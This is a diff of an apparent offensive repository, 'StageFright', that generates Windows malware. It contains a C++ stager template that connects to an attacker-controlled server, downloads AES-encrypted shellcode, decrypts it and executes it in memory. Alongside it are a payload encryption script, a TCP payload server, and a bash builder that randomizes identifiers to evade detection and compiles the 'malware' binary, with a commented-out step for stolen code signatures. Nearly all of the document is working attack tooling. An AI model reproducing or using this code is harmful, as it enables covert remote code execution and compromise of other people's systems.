+char Random7[] = KEYVALUE
+
+int main() {
+    LPCWSTR szServer = L"HOSTNAME";
+    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
+
+    PBYTE Random8;
+    SIZE_T Random8Size;
+
+    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
+
+    if (success) {
+        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
+
+        success = Random2(Random8, Random8Size);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = Random8Size;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&Random8,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(Random8);
+    }
+
+    return success ? 0 : 1;
+}
+

StageFright/StageFright/StageFright/TCP/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/TCP/Resources/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*zhCAcpCedgP)();
+
+bool kGOSfrjfhwzM(const char* TEInSsEqj, int yzdLOvSDmh, const char* Random4, char*& lfgRp, size_t& kIVqYdu) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(yzdLOvSDmh);
+    serverAddress.sin_addr.s_addr = inet_addr(TEInSsEqj);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+if (bytesRead != sizeof(fileSize)) {
+    printf("Error receiving file size: %d\n", WSAGetLastError());
+    closesocket(clientSocket);
+    WSACleanup();
+    return false;
+}
+
+fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    lfgRp = new char[fileSize];
+    if (lfgRp == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, lfgRp + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] lfgRp;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    kIVqYdu = totalSize;
+    printf("Received data size: %zu\n", kIVqYdu);
+
+    return true;
+}
+
+int bVfdOlkjkxVS(char * DrKmsFdBXfMxR, unsigned int DrKmsFdBXfMxR_len, char * DLhQUbzLsS, size_t DLhQUbzLsSlen) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)DLhQUbzLsS, (DWORD)DLhQUbzLsSlen, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, DrKmsFdBXfMxR, &DrKmsFdBXfMxR_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+
+
+char DLhQUbzLsS []=  { 0xf1, 0x9c, 0xad, 0x3a, 0x41, 0x79, 0xfb, 0x9f, 0xb, 0xb5, 0x3, 0xd7, 0x18, 0x82, 0xdd, 0x64 };
+
+int main() {
+    const char* TEInSsEqj = "192.168.1.12";  // Replace with the actual server IP
+    int yzdLOvSDmh = 8080;               // Replace with the actual server port
+    const char* Random4 = "invoice.txt";  // Replace with the actual file path on the server
+
+    char* lfgRp;
+    size_t kIVqYdu;
+
+    if (kGOSfrjfhwzM(TEInSsEqj, yzdLOvSDmh, Random4, lfgRp, kIVqYdu)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", kIVqYdu);
+        
+        bVfdOlkjkxVS((char *) lfgRp, kIVqYdu, DLhQUbzLsS, sizeof(DLhQUbzLsS));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, kIVqYdu, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] lfgRp;
+            return 1;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, lfgRp, kIVqYdu);
+        
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, kIVqYdu, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] lfgRp;
+            return 1;
+        }
+
+        // Create a function pointer to the shellcode
+        zhCAcpCedgP lbagLzOZD = reinterpret_cast<zhCAcpCedgP>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        lbagLzOZD();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+    } else {
+        printf("Failed to receive binary data.\n");
+        return 1;
+    }
+
+    return 0;
+}
+

StageFright/StageFright/StageFright/TCP/TCP.sh

@@ -0,0 +1,188 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+  ___   _____ _____   _____                            _           _ 
+ / _ \ |  ___/  ___| |  ___|                          | |         | |
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
+                                            __/ | |                  
+                                           |___/|_|                  
+ _____ _                       _   _____ _____ ______                
+/  ___| |                     | | |_   _/  __ \| ___ \               
+\ `--.| |_ __ _  __ _  ___  __| |   | | | /  \/| |_/ /               
+ `--. \ __/ _` |/ _` |/ _ \/ _` |   | | | |    |  __/                
+/\__/ / || (_| | (_| |  __/ (_| |   | | | \__/\| |                   
+\____/ \__\__,_|\__, |\___|\__,_|   \_/  \____/\_|                   
+                 __/ |                                               
+                |___/                                                
+ _____                    _   _                                      
+|  ___|                  | | (_)                                     
+| |____  _____  ___ _   _| |_ _  ___  _ __                           
+|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
+| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
+\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                        
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's Your Server IP?"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter Your Port"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/TCP/template.cpp StageFright/TCP/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/TCP/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCP/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/TCP/conv.py StageFright/TCP/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCP/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/TCP/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/TCP/Resources/con.py
+sed -i "s/;//g" -i StageFright/TCP/Resources/con.py
+python3 StageFright/TCP/Resources/con.py
+#rm StageFright/TCP/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/TCP/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/PORTY/$PORTY/g" StageFright/TCP/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/TCP/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCP/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/TCP/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/TCP/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/TCP/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/TCP/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/TCP/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/TCP/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/TCP/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/TCP/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/TCP/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/TCP/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/TCP/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/TCP/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/TCP/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE StageFright/TCP/Resources/template.cpp -static-libgcc -static-libstdc++ -lws2_32 -lole32 -lwbemuuid -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+#echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+#echo ""
+#sleep 2
+#python3 StageFright/StageFright/ResourcesSigThief/sigthief.py -i StageFright/StageFright/TCP/Resources/OfficeSetup.exe #-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+#mv signed$MALWARE $MALWARE
+#echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+#echo ""
+
+

StageFright/StageFright/StageFright/TCP/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/TCP/tcp_server.py

@@ -0,0 +1,69 @@
+import socketserver
+import os
+
+class MyHandler(socketserver.BaseRequestHandler):
+    def handle(self):
+        print("Connection received from:", self.client_address)
+
+        try:
+            # Receive file path length
+            path_len_bytes = self.request.recv(8)
+            if not path_len_bytes:
+                print("Error receiving file path length.")
+                return
+
+            path_len = int.from_bytes(path_len_bytes, byteorder='little')  # Change byte order to 'little'
+            print(f"Received file path length: {path_len}")
+
+            # Receive file path
+            file_path_bytes = b""
+            while len(file_path_bytes) < path_len:
+                received_data = self.request.recv(path_len - len(file_path_bytes))
+                if not received_data:
+                    print("Error receiving file path.")
+                    return
+                file_path_bytes += received_data
+
+            file_name = file_path_bytes.decode('utf-8')
+            print("Received file name:", file_name)
+
+            # Check if the file exists
+            file_path = os.path.join(os.getcwd(), file_name)
+            print("Absolute file path:", file_path)
+            if os.path.exists(file_path):
+                print("File found:", file_path)
+
+                # Read file data
+                with open(file_path, 'rb') as file:
+                    file_data = file.read()
+
+                # Print the size before sending
+                file_size = len(file_data)
+                print("Size of file:", file_size)
+
+                # Send file size to the client
+                self.request.sendall(file_size.to_bytes(4, byteorder='big'))
+
+                # Send file data back to the client
+                self.request.sendall(file_data)
+                print("File data sent successfully.")
+
+            else:
+                print("File not found:", file_path)
+                self.request.sendall(b"FILE_NOT_FOUND")
+
+        except Exception as e:
+            print("Error:", str(e))
+            self.request.sendall(b"SERVER_ERROR")
+
+if __name__ == "__main__":
+    host, port = "192.168.1.12", 8080
+    server = socketserver.TCPServer((host, port), MyHandler)
+    print(f"Server listening on {host}:{port}")
+
+    try:
+        server.serve_forever()
+    except KeyboardInterrupt:
+        print("Server shutting down.")
+        server.shutdown()
+

StageFright/StageFright/StageFright/TCP/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*RandomA)();
+
+bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(Random3);
+    serverAddress.sin_addr.s_addr = inet_addr(Random2);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+if (bytesRead != sizeof(fileSize)) {
+    printf("Error receiving file size: %d\n", WSAGetLastError());
+    closesocket(clientSocket);
+    WSACleanup();
+    return false;
+}
+
+fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    Random5 = new char[fileSize];
+    if (Random5 == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] Random5;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    Random6 = totalSize;
+    printf("Received data size: %zu\n", Random6);
+
+    return true;
+}
+
+int Random7(char * Random8, unsigned int Random8_len, char * Random9, size_t Random9len) {
+        HCRYPTPROV hProv;
+        HCRYPTHASH hHash;
+        HCRYPTKEY hKey;
+
+        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+                return -1;
+        }
+        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+                return -1;
+        }
+        if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)){
+                return -1;              
+        }
+        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+                return -1;
+        }
+        
+        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, Random8, &Random8_len)){
+                return -1;
+        }
+        
+        CryptReleaseContext(hProv, 0);
+        CryptDestroyHash(hHash);
+        CryptDestroyKey(hKey);
+        
+        return 0;
+}
+
+
+
+char Random9 []= KEYVALUE
+
+int main() {
+    const char* Random2 = "HOSTNAME";  // Replace with the actual server IP
+    int Random3 = PORTY;               // Replace with the actual server port
+    const char* Random4 = "SHELLCODEFILE";  // Replace with the actual file path on the server
+
+    char* Random5;
+    size_t Random6;
+
+    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", Random6);
+        
+        Random7((char *) Random5, Random6, Random9, sizeof(Random9));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] Random5;
+            return 1;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, Random5, Random6);
+        
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] Random5;
+            return 1;
+        }
+
+        // Create a function pointer to the shellcode
+        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        RandomB();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+    } else {
+        printf("Failed to receive binary data.\n");
+        return 1;
+    }
+
+    return 0;
+}
+